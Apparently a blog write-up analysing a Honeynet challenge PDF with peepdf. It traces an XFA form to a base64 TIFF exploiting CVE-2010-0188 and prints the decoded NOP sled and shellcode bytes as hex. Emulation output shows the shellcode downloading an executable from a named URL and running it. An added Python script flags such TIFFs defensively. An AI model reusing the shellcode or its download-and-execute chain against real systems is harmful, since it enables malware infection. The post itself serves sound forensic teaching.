Analysing the Honeynet Project challenge PDF file with peepdf (II)

After the "useless" analysis of the fake objects, we can now focus on the objects that the PDF reader will actually parse:

/Catalog (27)
dictionary (28)
dictionary (22)
dictionary (23)
dictionary (22)
/Annot (24)
dictionary (23)
/Page (25)
/Pages (26)
/Page (25)
stream (21)
/Pages (26)

If we take a look at the Catalog object...

PPDF> object 27

<< /AcroForm 28 0 R
/MarkInfo << /Marked true >>
/Pages 26 0 R
/Type /Catalog
/Lang en-us
/PageMode /UseAttachments >>

There are no triggers here (/OpenAction) or in the rest of the objects (/AA), so it seems that the /AcroForm element has something to say. Also, the suspicious object 21 (/EmbeddedFile) is related to this interactive form:

PPDF> references to 21

[28]

PPDF> object 28

<< /DA /Helv 0 Tf 0 g
/Fields [ 22 0 R ]
/XFA [ template 21 0 R ] >>

In the form dictionary we can see that object 21 is an XFA template and that there is a reference to a field object (object 22). So we continue analysing the field objects:

PPDF> object 22

<< /V
/T topmostSubform[0]
/Kids [ 23 0 R ] >>

PPDF> object 23

<< /Parent 22 0 R
/Kids [ 24 0 R ]
/T Page1[0] >>

PPDF> object 24

<< /Parent 23 0 R
/T ImageField1[0]
/Ff 65536
/MK << /TP 1
/IF << /A [ 0.0 1.0 ] >> >>
/F 4
/Rect [ 107.385 705.147 188.385 709.087 ]
/Type /Annot
/FT /Btn
/DA /CourierStd 10 Tf 0 g
/Subtype /Widget
/TU ImageField1
/P 25 0 R >>

We arrive at the last field element, called ImageField1, which has a suspicious value for its /Ff entry, 65536... Now it's time to take a look at the content of this field in the template (object 21):

...
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
...

Mmm... we have a TIFF image, CVE-2010-0188? The content is base64-encoded, so we put it in a variable and decode it:

PPDF> set sh "SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ..."
PPDF> set output variable raw_sh
PPDF> decode variable sh b64

49 49 2a 00 38 20 00 00 90 90 90 90 90 90 90 90 |II*.8 ..........|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
...
90 90 90 90 90 90 90 90 90 90 90 90 90 31 c9 dd |.............1..|
c5 b8 53 2c 18 36 d9 74 24 f4 5f b1 66 31 47 18 |..S,.6.t$._.f1G.|
83 c7 04 03 47 14 e2 a6 c7 08 6c 02 2b e0 f6 2b |....G.....l.+..+|
77 f3 76 7f 82 6a 94 85 79 89 b1 92 81 6d be 14 |w.v.j..y....m..|
32 0b d8 4d 09 d6 e3 c4 17 b0 8d 04 f1 56 bf c1 |2..M.........V..|
84 6d d2 c8 16 9f 93 f8 f2 05 01 11 85 a7 bc 83 |.m..............|
98 c0 78 c9 ff 1c ac 60 55 54 9d b4 62 87 87 d2 |..x....`UT..b...|
11 ba ac 11 42 7a 58 ea 80 ea 5d d2 41 53 c3 06 |....BzX...].AS..|
0e 1b 3b 70 36 c9 ef 6e 66 53 95 d4 d0 d4 30 b0 |..;p6..nfS....0.|
4a 74 ba 52 1a 67 9b d7 86 d2 7b af 2d 78 23 5d |Jt.R.g....{.-x#]|
cb e7 8e 73 88 05 41 69 11 bd 8f c4 5e 5c 6f a7 |...s..Ai....^\o.|
69 c6 e9 de 70 a6 9d 2b 4b 3e 50 ce 97 ad 2d e3 |i...p..+K>P...-.|
80 12 dc a7 28 0b 86 bd 15 a6 76 1e b0 11 91 4c |....(.....v....L|
a0 44 0d 95 e0 6d 24 1c fc d4 35 e7 cb b1 77 62 |.D...m$...5...wb|
92 a0 12 49 d2 6c de 0f fe 09 82 4e fc b7 24 3a |...I.l.....N..$:|
a4 0e 9f f0 98 58 46 ca 42 49 c2 1b 46 0b 02 f2 |.....XF.BI..F...|
9e b2 54 69 8b 62 5c 6d 92 78 fe 45 ef 4e 35 33 |..Ti.b\m.x.E.N53|
bb 93 0a 89 40 63 21 b4 ec fa 8a 20 77 9b 2a 50 |....@c!.... w.*P|
9a aa 38 5e 9f f5 42 63 8b fa 57 71 d5 dd 54 68 |..8^..Bc..Wq..Th|
2c 01 4e 9f 4d 36 52 af 45 4b 97 a2 6c 5f 88 e4 |,.N.M6R.EK..l_..|
08 6e b9 e3 f7 8e c6 f1 91 8d d6 f5 4f e0 e8 1e |.n..........O...|
73 03 f7 79 59 02 f0 84 b7 1b fa 9d c0 37 1d b9 |s..yY........7..|
a8 24 35 cc 3f 42 3d b7 0c 60 17 1a 7a 99 6f 51 |.$5.?B=..`..z.oQ|
75 9e 6d 54 8c 80 7e 93 8d e7 e6 33 1a 6c 69 f9 |u.mT..~....3.li.|
cd a3 eb 91 7e db c5 01 ee 4d 7f a8 9e f4 0b 64 |....~....M....d|
30 85 94 56 a3 10 74 c0 54 91 ef 62 d8 3c 93 25 |0..V..t.T..b.<.%|
7d d7 32 b5 ed 42 db 22 8b a3 57 c4 36 e3 e5 71 |}.2..B."..W.6..q|
d8 77 55 14 7b e4 1e 87 09 91 ce 22 96 3c 8f 90 |.wU.{......".<..|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|

PPDF> reset output
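As an added triage example (not part of the original post and not peepdf code), the following Python script does outside peepdf what the steps above do by hand: it finds image fields in an xfa:datasets packet, base64-decodes them, reads the first-IFD offset from the TIFF header, and flags a blob whose IFD lies past the end of the data or that contains a long run of 0x90 bytes. The packet and the TIFF bytes are constructed samples, not taken from the challenge file.

```python
import base64
import re
import struct
import xml.etree.ElementTree as ET

XFA_NS = "http://www.xfa.org/schema/xfa-data/1.0/"

# Constructed sample (not the challenge file): a TIFF "II*" header with an IFD
# offset of 0x2038, a long 0x90 run and a few arbitrary trailing bytes.
FAKE_TIFF = b"II*\x00" + struct.pack("<I", 0x2038) + b"\x90" * 600 + b"\x31\xc9\xdd\xc5"

def xfa_image_packet(blob, field="ImageField1"):
    """Wrap blob as a base64 image field inside a minimal xfa:datasets packet."""
    b64 = base64.b64encode(blob).decode()
    return (f'<xfa:datasets xmlns:xfa="{XFA_NS}"><xfa:data><topmostSubform>'
            f'<{field} xfa:contentType="image/tif" href="">{b64}</{field}>'
            f'<TextField1>hello</TextField1></topmostSubform></xfa:data></xfa:datasets>')

def tiff_ifd_offset(data):
    """First-IFD offset from a TIFF header (little or big endian), or None if not a TIFF."""
    if len(data) < 8:
        return None
    if data[:4] == b"II*\x00":
        return struct.unpack("<I", data[4:8])[0]
    if data[:4] == b"MM\x00*":
        return struct.unpack(">I", data[4:8])[0]
    return None

def longest_nop_run(data):
    """Length of the longest run of 0x90 bytes, a cheap NOP-sled indicator."""
    return max((len(r) for r in re.findall(rb"\x90+", data)), default=0)

def triage_xfa_images(xml_text, sled_threshold=64):
    """Decode every xfa image field; flag TIFFs with a NOP sled or an IFD past the end."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        ctype = el.get(f"{{{XFA_NS}}}contentType", "")
        if not ctype.startswith("image/") or not (el.text or "").strip():
            continue
        try:
            blob = base64.b64decode("".join(el.text.split()))
        except ValueError:
            continue  # not valid base64: leave it for manual inspection
        ifd = tiff_ifd_offset(blob)
        sled = longest_nop_run(blob)
        findings.append({"field": el.tag, "size": len(blob), "ifd_offset": ifd, "nop_run": sled,
                         "suspicious": ifd is not None and (sled >= sled_threshold or ifd >= len(blob))})
    return findings
```

Run `triage_xfa_images(xfa_image_packet(FAKE_TIFF))` to see the constructed field reported with its IFD offset and NOP-run length.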

Now that we have the raw content in a variable, we can emulate its execution with the sctest wrapper:

PPDF> sctest variable raw_sh

verbose = 0
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(32)
stepcount 9172
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041767d =>
           = "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417691 =>
           = "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417699 =>
           = "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x004176a4 =>
           = "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x004176b1 =>
           = "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x004176b8 =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x0012fe7c =>
         none;
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x004176cb =>
           = "http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe";
     LPCTSTR szFileName = 0x0012fe7c =>
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fe7c =>
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;

Done! Finally we have the trigger and the executed payload of the malicious PDF file! This shellcode also tries to download a binary and execute it, but this time the URL is the real one :)


Analysing the Honeynet Project challenge PDF file with peepdf (I)

Hey, hope you enjoyed the challenge :). It was designed to be fun. BTW, it's interesting enough to see many submitters got confused with /Root :).

Yeah! I really enjoyed it, it was interesting to see that behaviour :) Good work! ;)